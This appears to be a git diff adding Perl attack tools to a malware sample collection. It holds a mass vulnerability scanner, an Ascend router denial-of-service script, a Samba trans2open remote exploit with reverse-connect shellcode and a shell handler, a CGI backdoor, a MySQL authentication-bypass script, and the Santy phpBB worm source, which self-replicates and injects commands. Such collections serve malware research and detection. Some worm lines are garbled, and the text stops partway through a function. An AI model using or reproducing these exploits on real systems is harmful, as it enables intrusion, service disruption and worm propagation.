+###############################################################
+sub win2_scan {
+
+ my($iaddr,$paddr,$proto);
+$iaddr = inet_aton($server) || die "Error: $!";
+$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
+$proto = getprotobyname('tcp') || die "Error: $!"; 
+socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
+connect(SOCK, $paddr) || &error("Unable to connect: $!");
+send(SOCK,$sc,0);
+
+	$check=<SOCK>;
+	($http,$code,$blah) = split(/ /,$check);
+	if($code == 200)
+	{
+		print "[Found!]\n";
+		$insecure++;
+	}
+	else
+	{
+		print "[Not Found]\n";
+
+	}
+	close(SOCK);
+}
+
+################################ USAGE ##########################
+sub usage {
+        system "clear";
+        print "\n\n\n          Fast Scanner   \n\n";
+       print "                   || by Energy ||  \n\n";
+        print "Used to mass scan Windows,IRIX and Linux b0x\n\n";
+	print "Usage: perl usdl.pl hostlist.txt logfile.txt [porta]\n\n";
+	exit(0); }
+################################ END   ##########################
+print "[Test $size hosts $port e $insecure sites vulnerable]\n";
+
diff --git a/Perl/HackTool.Perl.Small.f b/Perl/HackTool.Perl.Small.f
new file mode 100644
index 00000000..bca7b3f1
--- /dev/null
+++ b/Perl/HackTool.Perl.Small.f
@@ -0,0 +1,57 @@
+
+#
+# Ascend Kill II - perl version
+# (C) 1998 Rootshell - http://www.rootshell.com/ - <info@rootshell.com>
+#
+# Released: 3/17/98
+#
+# Thanks to Secure Networks.  See SNI-26: Ascend Router Security Issues
+# (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
+#
+#  NOTE: This program is NOT to be used for malicous purposes.  This is
+#        intenteded for educational purposes only.  By using this program
+#        you agree to use this for lawfull purposes ONLY.
+#
+#
+
+use Socket;
+
+require "getopts.pl";
+
+sub AF_INET {2;}
+sub SOCK_DGRAM {2;}
+
+sub ascend_kill {
+  $remotehost = shift(@_);
+  chop($hostname = `hostname`);
+  $port = 9;
+  $SIG{'INT'} = 'dokill';
+  $sockaddr = 'S n a4 x8';
+  ($pname, $aliases, $proto) = getprotobyname('tcp');
+  ($pname, $aliases, $port) = getservbyname($port, 'tcp')
+  unless $port =~ /^\d+$/;
+  ($pname, $aliases, $ptype, $len, $thisaddr) =
+  gethostbyname($hostname);
+  $this = pack($sockaddr, AF_INET, 0, $thisaddr);
+  ($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost);
+  $that = pack($sockaddr, AF_INET, $port, $thataddr);
+  socket(S, &AF_INET, &SOCK_DGRAM, 0);
+    $msg = pack("c64",
+    0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
+    0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+    0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
+    0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
+    0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
+    0x50, 0x41, 0x53, 0x53);
+  for ($i=0; $i<500; $i++) {
+    $msg .= pack("c1", 0xff);
+  }
+  send(S,$msg,0,$that) || die "send:$!";
+}
+
+if ($ARGV[0] eq '') {
+  print "usage: akill2.pl <remote_host>\n";
+  exit;
+}
+
+&ascend_kill($ARGV[0]);
diff --git a/Perl/HackTool.Perl.TransRoot b/Perl/HackTool.Perl.TransRoot
new file mode 100644
index 00000000..6df3e890
--- /dev/null
+++ b/Perl/HackTool.Perl.TransRoot
@@ -0,0 +1,492 @@
+###############
+
+##[ Header
+#	  Name:	 trans2root.pl
+#      Purpose:	 Proof of concept exploit for Samba 2.2.x (trans2open overflow)
+#	   CVE:	 CAN-2003-0201
+#	Author:	 H D Moore <hdmoore@digitaldefense.net>
+#    Copyright:	 Copyright (C) 2003 Digital Defense Inc.
+# Release Date:	 April 7, 2003
+#     Revision:	 1.0
+#     Download:	 http://www.digitaldefense.net/labs/securitytools.html
+#     Modified:	 By SARA team to incorporate for sara
+##
+
+use strict;
+use Socket;
+use IO::Socket;
+use IO::Select;
+use POSIX;
+use Getopt::Std;
+
+$SIG{USR2} = \&GoAway;
+
+my %args;
+my %targets =
+(
+    "linx86"  => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86],
+    "solx86"  => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86],
+    "fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86],
+    # name	# default   # start	# end	   # step  # function
+);
+
+getopt('t:M:h:p:r:x:H:P:', \%args);
+
+my $target_type	= $args{t} || Usage();
+my $target_host	= $args{h} || Usage();
+my $local_host	= $args{H} || Usage();
+my $local_port	= $args{P} || 1981;
+my $target_port	= $args{p} || 139;
+my $mode	= $args{x} || "";
+
+my $target_mode	= "brute";
+
+if (! exists($targets{$target_type})) {	Usage(); }
+print "[*] Using target	type: $target_type\n";
+
+# allow	single mode via	the -M option
+if ($args{M} &&	uc($args{M}) eq	"S")
+{
+    $target_mode = "single";
+}
+
+# the parent process listens for an incoming connection
+# the child process handles the	actual exploitation
+my $listen_pid = $$;
+my $exploit_pid	= StartListener($local_port);
+
+# get the default return address for single mode
+my $targ_ret = $args{r}	|| $targets{$target_type}->[0];
+my $curr_ret;
+$targ_ret = eval($targ_ret);
+
+if ($target_mode !~ /brute|single/)
+{
+    print "[*] Invalid attack mode: $target_mode (single or brute only)\n";
+    exit(0);
+}
+
+
+if ($target_mode eq "single")
+{
+    $curr_ret =	$targ_ret;
+    if(! $targ_ret)
+    {
+       print "[*] Invalid return address specified!\n";
+	kill("USR2", $listen_pid);
+	exit(0);
+    }
+
+    print "[*] Starting	single shot mode...\n";
+    printf ("[*] Using return address of 0x%.8x\n", $targ_ret);
+    my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret);
+    my $ret = AttemptExploit($target_host, $target_port, $buf);
+
+    sleep(2);
+    kill("USR2", $listen_pid);
+    exit(0);
+}
+
+
+if ($target_mode eq "brute")
+{
+    print "[*] Starting	brute force mode...\n";
+
+    for	(
+	  $curr_ret  =$targets{$target_type}->[1];
+	  $curr_ret >= $targets{$target_type}->[2];
+	  $curr_ret -=$targets{$target_type}->[3]
+	)
+    {
+	select(STDOUT);	$|++;
+	my $buf	= $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret);
+	printf ("					 \r[*] Return Address: 0x%.8x",	$curr_ret);
+	my $ret	= AttemptExploit($target_host, $target_port, $buf);
+    }
+    sleep(2);
+    kill("USR2", $listen_pid);
+    exit(0);
+}
+
+sub Usage {
+
+    print STDERR "\n";
+    print STDERR " trans2root.pl - Samba 2.2.x 'trans2open()' Remote Exploit\n";
+    print STDERR "===========================================================\n\n";
+    print STDERR "    Usage: \n";
+    print STDERR "	     $0	<options> -t <target type> -H <your ip>	-h <target ip>\n";
+    print STDERR "  Options:  \n";
+    print STDERR "	     -M	(S|B) <single or brute mode>\n";
+    print STDERR "	     -r	      <return address for single mode>\n";
+    print STDERR "	     -p	      <alternate Samba port>\n";
+    print STDERR "	     -P	      <alternate listener port>\n";
+    print STDERR "  Targets:\n";
+    foreach my $type (keys(%targets))
+    {
+	print STDERR "		  $type\n";
+    }
+    print STDERR "\n";
+
+
+    exit(1);
+}
+
+
+sub StartListener {
+    my ($local_port) = @_;
+    my $listen_pid = $$;
+
+    my $s = IO::Socket::INET->new (
+		Proto => "tcp",
+		LocalPort => $local_port,
+		Type =>	SOCK_STREAM,
+		Listen => 3,
+		ReuseAddr => 1
+    );
+
+    if (! $s)
+    {
+	print "[*] Could not start listener: $!\n";
+	exit(0);
+    }
+
+    print "[*] Listener	started	on port	$local_port\n";
+
+    my $exploit_pid = fork();
+    if ($exploit_pid)
+    {
+	my $victim;
+	$SIG{USR2} = \&GoAway;
+
+	while ($victim = $s->accept())
+	{
+	    kill("USR2", $exploit_pid);
+	    if ($mode eq "Sara") {
+	      print STDOUT "\n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "\n\n";
+	      StartShell($victim);
+	    } else {
+	      print "System is vulnerable to attack\n";
+	      exit(0);
+	    }
+	}
+	exit(0);
+    }
+    return ($exploit_pid);
+}
+
+sub StartShell {
+    my ($client) = @_;
+    my $sel = IO::Select->new();
+
+    Unblock(*STDIN);
+    Unblock(*STDOUT);
+    Unblock($client);
+
+    select($client); $|++;
+    select(STDIN);   $|++;
+    select(STDOUT);  $|++;
+
+    $sel->add($client);
+    $sel->add(*STDIN);
+
+    print $client "echo	\\-\\-\\=\\[ Welcome to	`hostname` \\(`id`\\)\n";
+    print $client "echo	\n";
+
+    while (fileno($client))
+    {
+	my $fd;
+	my @fds	= $sel->can_read(0.2);
+
+	foreach	$fd (@fds)
+	{
+	    my @in = <$fd>;
+
+	    if(! scalar(@in)) {	next; }
+
+	    if (! $fd || ! $client)
+	    {
+		print "[*] Closing connection.\n";
+		close($client);
+		exit(0);
+	    }
+
+	    if ($fd eq $client)
+	    {
+		print STDOUT join("", @in);
+	    } else {
+		print $client join("", @in);
+	    }
+	}
+    }
+    close ($client);
+}
+
+sub AttemptExploit {
+    my ($Host, $Port, $Exploit)	= @_;
+    my $res;
+
+    my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port,	Type =>	SOCK_STREAM, Protocol => "tcp");
+
+    if (! $s)
+    {
+	print "\n[*] Error: could not connect: $!\n";
+	kill("USR2", $listen_pid);
+	exit(0);
+    }
+
+    select($s);	$|++;
+    select(STDOUT); $|++;
+    Unblock($s);
+
+    my $SetupSession =
+	"\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x08".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01".
+	"\x00\x00\x00\x00";
+
+    my $TreeConnect =
+	"\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00".
+	"\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24".
+	"\x25\x6e\x6f\x62\x6f\x64\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50".
+	"\x43\x24";
+
+    my $Flush =	("\x00"	x 808);
+
+    print $s $SetupSession;
+    $res = ReadResponse($s);
+
+    print $s $TreeConnect;
+    $res = ReadResponse($s);
+
+    # uncomment	this for diagnostics
+  #  print "[*]	Press Enter to Continue...\n";
+  #  $res = <STDIN>;
+
+    print "[*] Sending Exploit Buffer...\n";
+
+    print $s $Exploit;
+    print $s $Flush;
+
+    ReadResponse($s);
+    close($s);
+}
+
+sub CreateBuffer_linx86	{
+    my ($Host, $Port, $Return) = @_;
+
+    my $RetAddr	=  eval($Return);
+    $RetAddr = pack("l", $RetAddr);
+
+    my ($a1, $a2, $a3, $a4) = split(//,	gethostbyname($Host));
+    $a1	= chr(ord($a1) ^ 0x93);
+    $a2	= chr(ord($a2) ^ 0x93);
+    $a3	= chr(ord($a3) ^ 0x93);
+    $a4	= chr(ord($a4) ^ 0x93);
+
+    my ($p1, $p2) = split(//, reverse(pack("s",	$Port)));
+    $p1	= chr(ord($p1) ^ 0x93);
+    $p2	= chr(ord($p2) ^ 0x93);
+
+    my $exploit	=
+	# trigger the trans2open overflow
+	"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
+	"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
+
+	GetNops(772) .
+
+	# xor decoder courtesy of hsj
+	"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
+	"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
+	"\x93\x40\xe2\xfa".
+
+	# reverse-connect, mangled lamagra code	+ fixes
+	"\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b".
+	"\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a".
+	"\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d".
+	$p1.$p2	."\x54\xd6\x63". $a1.$a2.$a3.$a4.
+	"\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67".
+	"\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e".
+	"\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b".
+	"\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60".
+	"\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa".
+	"\xfd\xbc\xe0\xfb".
+
+	GetNops(87).
+
+	($RetAddr x 8).
+
+	"DDI!".	("\x00"	x 277);
+
+    return $exploit;
+}
+
+sub CreateBuffer_solx86	{
+    my ($Host, $Port, $Return) = @_;
+
+    my $RetAddr	=  eval($Return);
+    my $IckAddr	= $RetAddr - 512;
+
+    $RetAddr = pack("l", $RetAddr);
+    $IckAddr = pack("l", $IckAddr);
+
+    # IckAddr needs to point to	a writable piece of memory
+
+    my ($a1, $a2, $a3, $a4) = split(//,	gethostbyname($Host));
+    $a1	= chr(ord($a1) ^ 0x93);
+    $a2	= chr(ord($a2) ^ 0x93);
+    $a3	= chr(ord($a3) ^ 0x93);
+    $a4	= chr(ord($a4) ^ 0x93);
+
+    my ($p1, $p2) = split(//, reverse(pack("s",	$Port)));
+    $p1	= chr(ord($p1) ^ 0x93);
+    $p2	= chr(ord($p2) ^ 0x93);
+
+    my $exploit	=
+	# trigger the trans2open overflow
+	"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
+	"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
+
+	GetNops(813) .
+
+	# xor decoder courtesy of hsj
+	"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
+	"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
+	"\x93\x40\xe2\xfa".
+
+	# reverse-connect, code	by bighawk
+	"\x2b\x6c\x6b\x6c\xaf\x64\x43\xc3\xa2\x53\x23\x09\xc3\x1a\x76\xa2".
+	"\x5a\xc2\xd2\xd2\xc2\xc2\x23\x75\x6c\x46\xa2\x41\x1a\x54\xfb".
+	$a1.$a2.$a3.$a4	."\xf5\xfb". $p1.$p2.
+	"\xf5\xc2\x1a\x75\xf9\x83\xc5\xc4\x23\x78\x6c\x46\xa2\x41\x21\x9a".
+	"\xc2\xc1\xc4\x23\xad\x6c\x46\xda\xea\x61\xc3\xfb\xbc\xbc\xe0\xfb".
+	"\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc3\xc0\x1a\x71\xc3\xc1\xc0\x23\xa8".
+	"\x6c\x46".
+
+	GetNops(87) .
+
+	"010101".
+	$RetAddr.
+	$IckAddr.
+	$RetAddr.
+	$IckAddr.
+	"101010".
+
+	"DDI!".	("\x00"	x 277);
+
+    return $exploit;
+}
+
+sub CreateBuffer_bsdx86	{
+    my ($Host, $Port, $Return) = @_;
+
+    my $RetAddr	=  eval($Return);
+    my $IckAddr	= $RetAddr - 512;
+
+    $RetAddr = pack("l", $RetAddr);
+    $IckAddr = pack("l", $IckAddr);
+
+    # IckAddr needs to point to	a writable piece of memory
+
+    my ($a1, $a2, $a3, $a4) = split(//,	gethostbyname($Host));
+    $a1	= chr(ord($a1) ^ 0x93);
+    $a2	= chr(ord($a2) ^ 0x93);
+    $a3	= chr(ord($a3) ^ 0x93);
+    $a4	= chr(ord($a4) ^ 0x93);
+
+    my ($p1, $p2) = split(//, reverse(pack("s",	$Port)));
+    $p1	= chr(ord($p1) ^ 0x93);
+    $p2	= chr(ord($p2) ^ 0x93);
+
+    my $exploit	=
+	# trigger the trans2open overflow
+	"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
+	"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
+
+	GetNops(830) .
+
+	# xor decoder courtesy of hsj
+	"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
+	"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
+	"\x93\x40\xe2\xfa".
+
+	# reverse-connect, code	by bighawk
+	"\xa2\x5a\x64\x72\xc2\xd2\xc2\xd2\xc2\xc2\x23\xf2\x5e\x13\x1a\x50".
+	"\xfb".	$a1.$a2.$a3.$a4	."\xf5\xfb". $p1.$p2.
+	"\xf5\xc2\x1a\x75\x21\x83\xc1\xc5\xc3\xc3\x23\xf1\x5e\x13\xd2\x23".
+	"\xc9\xda\xc2\xc0\xc0\x5e\x13\xd2\x71\x66\xc2\xfb\xbc\xbc\xe0\xfb".
+	"\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc2\xc7\xc0\xc0\x23\xa8\x5e\x13".
+
+	GetNops(87) .
+
+	"010101".
+	$RetAddr.
+	$IckAddr.
+	$RetAddr.
+	$IckAddr.
+	"101010".
+
+	"DDI!".	("\x00"	x 277);
+
+    return $exploit;
+}
+
+sub Unblock {
+	my $fd = shift;
+	my $flags;
+	$flags = fcntl($fd,F_GETFL,0) || die "Can't get	flags for file handle: $!\n";
+	fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
+}
+
+sub GoAway {
+    exit(0);
+}
+
+sub ReadResponse {
+    my ($s) = @_;
+    my $sel = IO::Select->new($s);
+    my $res;
+    my @fds = $sel->can_read(4);
+    foreach (@fds) { $res .= <$s>; }
+    return $res;
+}
+
+sub HexDump {
+    my ($data) = @_;
+    my @x = split(//, $data);
+    my $cnt = 0;
+
+    foreach my $h (@x)
+    {
+	if ($cnt > 16)
+	{
+	    print "\n";
+	    $cnt = 0;
+	}
+
+	printf("\\x%.2x", ord($h));
+	$cnt++;
+    }
+    print "\n";
+}
+
+# thank	you k2 ;)
+sub GetNops {
+    my ($cnt) =	@_;
+    my @nops = split(//,"\x99\x96\x97\x95\x93\x91\x90\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97".
+			"\x46\x4e\xf8\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b".
+			"\xf5\x45\x4c");
+    return join	("", @nops[ map	{ rand @nops } ( 1 .. $cnt )]);
+}
diff --git a/Perl/HackTool.Perl.Ulgin b/Perl/HackTool.Perl.Ulgin
new file mode 100644
index 00000000..022cfab2
--- /dev/null
+++ b/Perl/HackTool.Perl.Ulgin
@@ -0,0 +1,48 @@
+# jerusalem (c) 2001
+# heavily untested and on_the_fly done cgi (i've written this code on my
+# organizer) - jerusalem@digitalmaphia.com / j3rus4lem@users.sourceforge.net
+$password = "phj34r"; # as usual
+## -note
+## if you don't want to show your password in clear (in the sourcecode)
+## use perl's crypt() function. a bogus example of this can be found
+## into http://sgxxx.net/users/jerusalem/ulogin.pl *subliminal message*
+use CGI qw/:standard/;
+print header,
+start_html('cgi backdoor - jerusalem\@digitalmaphia.com 2001'),
+h1('cgi backdoor - jerusalem\@digitalmaphia.com 2001'),
+start_form,
+"password: ",password_field('pass'),p,
+"port:     ",textfield('port'),
+# if you want your pass shown in clear just subst the password_field() function
+# with a textfield() one
+submit,
+end_form,
+hr;
+if (param()) {
+$pass = "<EM>"."$password"."</EM>";
+if (em(param('pass')) eq $pass) { werk(); } 
+else { stfu(); }
+sub stfu { print "password incorrect. sorry.\n"; }
+hr;
+}
+# This subroutine is a little and bogus example of what you can do
+# using a perl cgi. In this case, a daemon like the unix' echo is 
+# started and forked under a pid.
+sub werk {
+$aaa = em(param('port'));
+$aaa =~ s/<.*?>//g;
+my $pid = fork(); if ($pid) { exit(); } 
+yeha();
+sub yeha {
+use IO::Socket; 
+my $port = $aaa;
+my $socket = IO::Socket::INET->new(Listen => 5,
+                                   LocalPort => $port, 
+                                   Proto => 'tcp', 
+                                   Reuse => 1);
+while ($new = $socket->accept()) { $new->autoflush(1); command(); }
+sub command { while (<$new>) { $comm = $_; chomp $comm;
+print $new "$comm\n";
+command(); } }
+} 
+}
diff --git a/Perl/HackTool.Perl.VulnTest.a b/Perl/HackTool.Perl.VulnTest.a
new file mode 100644
index 00000000..176a11c6
--- /dev/null
+++ b/Perl/HackTool.Perl.VulnTest.a
@@ -0,0 +1,139 @@
+#
+# The script connects to MySQL and attempts to log in using a zero-length password
+# Based on the vuln found by NGSSecurity
+#
+# The following Perl script can be used to test your version of MySQL. It will display 
+# the login packet sent to the server and it's reply.
+# 
+# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
+# elik beyondsecurity com
+#
+use strict;
+use IO::Socket::INET;
+
+usage() unless ((@ARGV >= 1) || (@ARGV <= 3));
+
+my $username = shift(@ARGV);
+my $host = shift(@ARGV);
+if (!$host)
+{
+ usage();
+}
+my $port = shift(@ARGV);
+if (!$port)
+{
+$port = 3306; print "Using default MySQL port (3306)\n";
+}
+
+# create the socket
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
+$socket or die "Cannot connect to host!\n";
+
+# receive greeting
+my $reply;
+recv($socket, $reply, 1024, 0);
+if (length($reply) < 7)
+{
+print "Not allowed to connect to MySQL!\n";
+exit(1);
+}
+print "Received greeting:\n";
+HexDump($reply);
+print "\n";
+
+# here we define the login OK reply
+# my $login_ok = "\x01\x00\x00\x02\xFE";
+
+# break the username string into chars and rebuild it
+my $binuser = pack("C*", unpack("C*", $username));
+
+# send login caps packet with password
+my $packet = "\x85\xa6". 
+            "\x03\x00\x00".
+   "\x00".
+   "\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..
+            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+            "\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash
+            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash
+
+substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1)
+
+print "Sending caps packet:\n";
+HexDump($packet);
+print "\n";
+send $socket, $packet, 0;
+
+# receive reply
+recv($socket, $reply, 1024, 0);
+print "Received reply:\n";
+HexDump($reply);
+
+my @list_bytes = unpack("C*", $reply);
+
+#print "The fifth byte is: ", $list_bytes[4], "\n";
+if (length(@list_bytes) >= 4)
+{
+print "Response insufficent\n";
+}
+
+#if ($reply eq $login_ok)
+if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
+{
+print "Received OK reply, authentication successful!!\n";
+}
+else
+{
+print "Authentication failed!\n";
+}
+
+# close
+close($socket);
+
+
+sub usage
+{
+   # print usage information
+   print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n
+<username> - The DB username to authenticate as
+<host> - The host to connect to
+[port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n";
+   exit(1);
+}
+
+
+###
+# do a hexdump of a string (assuming it's binary)
+###
+sub HexDump
+{
+my $buffer = $_[0];
+
+# unpack it into chars
+my @up = unpack("C*", $buffer);
+my $pos=0;
+
+# calculate matrix sizes
+my $rows = int(@up/16);
+my $leftover = int(@up%16);
+
+for( my $row=0; $row < $rows; $row++, $pos+=16)
+{
+ printf("%08X\t", $pos);
+ my @values = @up[$pos .. $pos+15];
+ my @line;
+ foreach my $val (@values)
+ {
+  push(@line, sprintf("%02X", $val));
+ }
+ print join(' ', @line), "\n";
+}
+# print last line
+printf("%08X\t", $pos);
+my @values = @up[$pos .. $pos+$leftover-1];
+my @line;
+foreach my $val (@values)
+{
+ push(@line, sprintf("%02X", $val));
+}
+print join(' ', @line), "\n";
+}
\ No newline at end of file
diff --git a/Perl/Net-Worm.Perl.Santy.c b/Perl/Net-Worm.Perl.Santy.c
new file mode 100644
index 00000000..b819a58f
--- /dev/null
+++ b/Perl/Net-Worm.Perl.Santy.c
@@ -0,0 +1,212 @@
+#
+# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
+# -SECU For educational purpose
+#
+# See : http://isc.sans.org/diary.php?date=2004-12-21
+# http://www.f-secure.com/v-descs/santy_a.shtml
+#
+use
+strict;
+use Socket;
+
+sub PayLoad();
+sub DoDir($);
+sub DoFile ($);
+sub GoGoogle();
+
+sub GrabURL($);
+sub str2chr($);
+
+eval{ fork and exit; };
+
+my $generation = x;
+PayLoad() if $generation > 3;
+
+open IN, $0 or exit;
+my $self = join '', <IN>;
+close IN;
+unlink $0;
+
+while(!GrabURL('http://www.google.com/advanced_search')) {
+if($generation > 3)
+{
+PayLoad() ;
+} else {
+exit;
+}
+}
+
+$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;
+
+my $selfFileName = 'm1ho2of';
+my $markStr = 'HYv9po4z3jjHWanN';
+my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"';
+my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';
+
+while(1) {
+exit if -e 'stop.it';
+
+OUTER: for my $url (GoGoogle()) {
+
+exit if -e 'stop.it';
+
+$url =~ s/&highlight=.*$//;
+$url .= $tryCode;
+my $r = GrabURL($url);
+next unless defined $r;
+next unless $r =~ /$markStr/;
+
+while($self =~ /(.{1,20})/gs) {
+my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '),
+' . str2chr($1) . '),exit%252e%2527';
+
+$url =~ s/&highlight=.*$//;
+$url .= $portion;
+
+next OUTER unless GrabURL($url);
+}
+
+my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527';
+$url =~ s/&highlight=.*$//;
+$url .= $syst;
+
+GrabURL($url);
+}
+}
+
+
+
+sub str2chr($) {
+my $s = shift;
+
+$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
+$s =~ s/%252e$//;
+
+return $s;
+}
+
+
+sub GoGoogle() {
+my @urls;
+my @ts = qw/t p topic/;
+my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '&
+q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) .
+'%22&btnG=Search';
+my $goo1st = GrabURL($startURL)
+fined $goo1st;
+my $allGoo = $goo1st;
+my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26
+alt="" border=0><br>\d+</a>';
+while($goo1st =~ m#$r#g) {
+$allGoo . = GrabURL('www.google.com' . $1);
+}
+while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
+my $u = $1;
+next if $u =~ m#http://.*http://#i; # no redirects
+push(@urls, $u);
+}
+
+return @urls;
+}
+
+
+sub GrabURL($) {
+my $url = shift;
+$url =~ s#^http://##i;
+
+my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
+return unless defined($host) && defined($res);
+
+my $r =
+"GET $resHTTP/1.0\015\012" .
+"Host: $host\015\012" .
+"Accept:*/*\015\012" .
+"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
+"Pragma: no-cache\015\012" .
+"Cache-Control: no-cache\015\012" .
+"Referer: http://" . $host . $res . "\015\012" .
+
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
+"Connection: close\015\012\015\012";
+
+my $port = 80;
